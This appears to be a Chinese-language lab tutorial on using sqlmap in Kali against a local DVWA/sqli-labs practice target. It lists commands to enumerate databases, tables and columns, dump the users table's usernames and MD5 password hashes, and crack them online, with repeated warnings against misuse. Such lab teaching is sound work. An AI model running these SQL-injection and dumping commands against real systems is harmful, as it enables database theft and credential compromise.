基础环境:
- 靶场搭建dvwa以及sqlilab
- kali中的sqlmap使用
技术虽好,切勿滥用,遵守网络安全法!!!
技术虽好,切勿滥用,遵守网络安全法!!!
技术虽好,切勿滥用,遵守网络安全法!!!
技术虽好,切勿滥用,遵守网络安全法!!!
技术虽好,切勿滥用,遵守网络安全法!!!
-
获取目标 靶机IP
-
获取目标靶机的IP和端口以后,打开kali ,准备用sqlmap进行爆破
-
sqlmap -u “192.168.1.215/sqllabs/Less-1/?id=1” --dbs
- -u 设置目标主机以及路径
- –dbs 爆破数据库
此处可以看到爆破出的 数据库 列表
-
sqlmap -u “192.168.1.215/sqllabs/Less-1/?id=1” -D dvwa --tables
- -D 根据上面的爆破结果指定数据库
- –tables 爆破dvwa数据库的所有表
此处可以看到所有dvwa的表
-
sqlmap -u “192.168.1.215/sqllabs/Less-1/?id=1” -D dvwa -T users --columns
- -T 指定表名
- –columns 爆破所有的列
得到 dvwa 数据库 users 表中的所有列
-
sqlmap -u “192.168.1.215/sqllabs/Less-1/?id=1” -D dvwa -T users -C user,password --dump
- -C 指定列名(可指定多个,用英文逗号隔开)
- –dump 脱库(得到列中的字段内容)
-
爆破完成,得到用户名以及对应的MD5加密的密码,将密文复制到对应网站解密即可。
重要:
技术虽好,切勿滥用,遵守网络安全法!!!
技术虽好,切勿滥用,遵守网络安全法!!!
技术虽好,切勿滥用,遵守网络安全法!!!